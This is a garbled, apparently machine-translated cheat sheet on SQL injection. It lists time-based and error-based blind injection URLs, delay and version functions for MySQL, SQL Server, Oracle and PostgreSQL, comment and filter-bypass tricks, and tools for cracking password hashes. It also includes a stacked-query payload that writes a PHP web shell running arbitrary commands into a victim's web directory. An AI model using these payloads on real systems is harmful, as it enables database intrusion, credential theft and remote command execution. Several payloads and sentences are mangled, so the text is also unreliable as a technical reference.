On SQL injection

1.1 Injection statement (via time injection function)

Database name

Localhost:8080/scripttest/userservlet?username= ' Union SELECT IF (SUBSTRING (current,1,1) =char (101), BENCHMARK ( 10000000,encode (' SASSSG ', ' zcxczx ')), null), COUNT (*) from (SELECT Database () as current) as tbl;--password=w

Determine the system user name for the database

Localhost:8080/scripttest/userservlet?username= ' Union SELECT IF (SUBSTRING (current,3,1) =char (101), BENCHMARK ( 10000000,encode (' MSG ', ' by 5 seconds '), null), COUNT (*) from (SELECT System_user () as current) as tbl;--password=w

Determine the current user of the database

Localhost:8080/scripttest/userservlet?username= ' Union SELECT IF (SUBSTRING (current,3,1) =char (101), BENCHMARK ( 10000000,encode (' MSG ', ' by 5 seconds '), null), COUNT (*) from (SELECT Current_User () as current) as tbl;--password=w

The transaction ID that determines the last insert operation for the database

Localhost:8080/scripttest/userservlet?username= ' Union SELECT IF (SUBSTRING (current,3,1) =char (101), BENCHMARK ( 10000000,encode (' MSG ', ' by 5 seconds '), null), COUNT (*) from (SELECT last_insert_id () as current) as tbl;--password=w

Determine the name of a table under a database

Localhost:8080/scripttest/userservlet?username= ' Union SELECT IF (SUBSTRING (current,1,1) =char (), BENCHMARK ( 10000000,encode (' MSG ', ' by 5 Seconds ')), and null), COUNT (*) from (SELECT table_name as current from INFORMATION_SCHEMA. TABLES WHERE table_schema= ' MYTEST ' ORDER by Create_time limit 0,1) as tbl;--password=w

Access to various database labeling information

Non-blind tracking:

PostgreSQL: SELECT version ()

Oracle PL/SQL : SELECT banner from V$version

SELECT banner from V$version WHERE rownum=1

M Ysql: Select version () SELECT @ @version

Microsoft SQL Server: SELECT @ @version

@ @servername: Install the service name for SQL Server

@ @language: The name of the language currently in use

@ @spid: The current user's process ID

Method of delay time used by each database

PostgreSQL: Select pg_sleep–

Oracle PL/SQL :

BEGIN Dbms_lock.  SLEEP (5); END;

or 1=dbms_pipe.reveive_message (' RDS ', 10)

M Ysql:sleep (n) BENCHMARK (100000,encode (' HELLO ', ' MON '));

Microsoft SQL Server: xxx.jsp?uid=22;waitfor delay ' 0:0:5 '; --

Error information for different databases in union

Based on Error blinds

Www.victim/xxx/xxx/aaa.asp?id=12/is_srvrolemember (' sysadmin ')

function returns

1 indicates that the user belongs to the group

0 users do not belong to this group

NULL The group does not exist

So 12/x when X is 1 then return to normal interface, 0 error, according to this judgment

can also be judged according to the case statement

case when condition then ACTION1 ELSE ACTION2;

MySQL can use case or IF

SELECT (Database () = ' mytest ') then 1 else 0 end);

You can also use the IF function

Select if (database () = ' mytes1 ', 1,0);

terminating SQL injection (comment out some of the original SQL statements and replace them with your own SQL statement, the following are the individual database annotations)

SQL Sever Oracle PostgreSQL--,/* *

MySQL--, #,/* * *

Usage:

1. You can use the/**/proxy space in cases where the input space is filtered

2. Annotations can be used when determining the injection point, and if the same page is returned, there may be an injection

3. Impersonate a known user select * from ADMINISTRATORS WHERE username= ' admin '/* ' and password= ' * * *; This is only for the background business logic in the view that only the SQL returns the results of the ID, through the ID query information into the system. If the background verifies that input and return are worth consistency, it cannot be completed.

4. Identify database types with string connections

Database	Connection
SQL Server	' A ' + ' b ' = ' ab '
Mysql	' a ' b ' = ' ab '
Oracle and PostgreSQL	' A ' | | ' B ' = ' ab '

Using the method is to split the parameters of the injection point

Multi-statement execution

1. Sqlserver6.0 added the ability to execute multiple SQL statements on a connection handle.

means that you can add a update,insert after the normal query statement, such as statements to implement the change of permissions, adding delete users and other operations. Such functions are generally closed.

2. When MySQL is running on the same server as the Web server and the user running MySQL has sufficient privileges, the above command creates a file in the Web directory that allows execution of any command:

Http://www.victim.com/search.php?s=test '; Select ' <?php echo shell_exec ($_get["cmd"]);? > ' input outfile '/var/www/victim.com/shell.php ';--

Stack Query

There are certain limitations when PHP accesses PostgreSQL, PHP allows stacking queries, but accessing mysql,php is not allowed.

Stealing hash password hack tool

Sqlserve: Ngssqlcrack or In&abel

After version 05, the password query is in the Sys.sql_logins view.

05 was generated by the Pwdencrypt () function in the sysxlogins table under the master database

MySQL: John the Ripper hit John Bigpatch patch

PostgreSQL: if username bar Passwod is foo, plaintext is also allowed to store passwords.

Hash= ' MD5 ' | | MD5 (' Foobar ') =md53858f62230ac3c915f300c664312c63f

Oracle:The password column of the sys.use$ table stores the hash password for the database account. Dba_users tries to point to the table, starting from 11 the hash password no longer appears dba_users who. and exists under the Spare4 column, by default, sys.user$ exists old and new hash password for SHA1 Oracle The fastest is gsauditor for des the fastest is Laszlo Thth. The following is a common get clear command.

Non-mainstream channel

SQL injection gets system sensitive files

Bypass Filter

1. Filter by keyword filter can be achieved by changing the case

2. Select Master.dbo.fn_varbintohexstr (password_hash) from sys.sql_logins whee name = ' sa '

Sqlmap Injection Script Analysis

Time-Based Blinds

Sqlmap Blind based on time the main use of the MySQL database, such as the following statement two

Decision database name

SELECT * from UserInfo WHERE username= ' Illidan ' Rlike ((ORD (() (() (() (() ((), (() ((), (() (()), 1 , 1)) >64), SLEEP (5), 2510)) and ' vvvl ' = ' vvvl ' and password= ' 198226198484 ';

Decision Database Password

SELECT * from UserInfo WHERE username= ' Illidan ' Rlike ((ORD (() ((select 2136=if (ifnull as CHAR), password ) from Mytest.userinfo ORDER by Password LIMIT, ()) >8), SLEEP (5), 2136)) and ' ndhl ' = ' ndhl ' and password= ' 198226198 484 ';

SQL statement Description

Starting at the center of Rlike.

1. CAST (xxx as type) makes the target value a data type

2. The ifnull (exper1,exper2) function returns Exper1 if EXPER1 is not null

3. Midie intercept string similar to Subsring

4. The Ascell code value of the Ord readout character

5. if (Xx>64,sleep (5), 2510) determines the value if it is greater than 64 and sleeps 5 seconds, the third argument is the result of the return of the expression as false.

6. Sqlmap to determine its target value by heuristic

Rlike regular expression matching can be used instead of a union connection to customize a SELECT statement without the same number of column limits.

0x20 spaces

The Union will need to determine the number of columns queried by the original SQL statement, because the union cascade two queries require the same number of columns for two queries, which are often used in the Union blind

The CAST () and CONVERT () functions can get a type value and produce another type value

MID () truncated string

ORD (Gets the first character of the ASCLL code)

On SQL injection